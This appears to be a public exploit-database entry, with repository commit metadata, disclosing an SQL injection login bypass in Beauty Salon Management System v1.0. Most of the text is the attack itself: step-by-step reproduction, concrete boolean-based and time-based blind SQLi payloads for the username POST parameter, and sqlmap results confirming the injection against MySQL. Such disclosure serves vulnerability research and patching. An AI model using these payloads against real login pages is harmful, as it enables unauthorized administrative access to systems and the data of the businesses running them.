9461677d02
4 changes to exploits/shellcodes/ghdb Beauty Salon Management System v1.0 - SQLi Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) Car Rental Script 1.8 - Stored Cross-site scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
75 lines
No EOL
2.5 KiB
Text
75 lines
No EOL
2.5 KiB
Text
# Exploit Title: Beauty Salon Management System v1.0 - SQLi
|
|
# Date of found: 04/07/2023
|
|
# Exploit Author: Fatih Nacar
|
|
# Version: V1.0
|
|
# Tested on: Windows 10
|
|
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>
|
|
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/
|
|
# CWE: CWE-89
|
|
|
|
Vulnerability Description -
|
|
|
|
Beauty Salon Management System: V1.0, developed by Campcodes, has been
|
|
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability
|
|
allows an attacker to manipulate login authentication with the SQL queries
|
|
and bypass authentication. The system fails to properly validate
|
|
user-supplied input in the username and password fields during the login
|
|
process, enabling an attacker to inject malicious SQL code. By exploiting
|
|
this vulnerability, an attacker can bypass authentication and gain
|
|
unauthorized access to the system.
|
|
|
|
Steps to Reproduce -
|
|
|
|
The following steps outline the exploitation of the SQL Injection
|
|
vulnerability in Beauty Salon Management System V1.0:
|
|
|
|
1. Open the admin login page by accessing the URL:
|
|
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php
|
|
|
|
2. In the username and password fields, insert the following SQL Injection
|
|
payload shown inside brackets to bypass authentication for usename
|
|
parameter:
|
|
|
|
{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
|
|
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
|
|
In}
|
|
|
|
3.Execute the SQL Injection payload.
|
|
|
|
As a result of successful exploitation, the attacker gains unauthorized
|
|
access to the system and is logged in with administrative privileges.
|
|
|
|
Sqlmap results:
|
|
|
|
POST parameter 'username' is vulnerable. Do you want to keep testing the
|
|
others (if any)? [y/N] y
|
|
|
|
sqlmap identified the following injection point(s) with a total of 793
|
|
HTTP(s) requests:
|
|
|
|
---
|
|
|
|
Parameter: username (POST)
|
|
|
|
Type: boolean-based blind
|
|
|
|
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
|
|
|
|
Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374
|
|
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign
|
|
In
|
|
|
|
Type: time-based blind
|
|
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
|
|
Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--
|
|
rvYF&password=test&login=Sign In
|
|
|
|
---
|
|
|
|
[15:58:56] [INFO] the back-end DBMS is MySQL
|
|
|
|
web application technology: PHP 8.2.4, Apache 2.4.56
|
|
|
|
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) |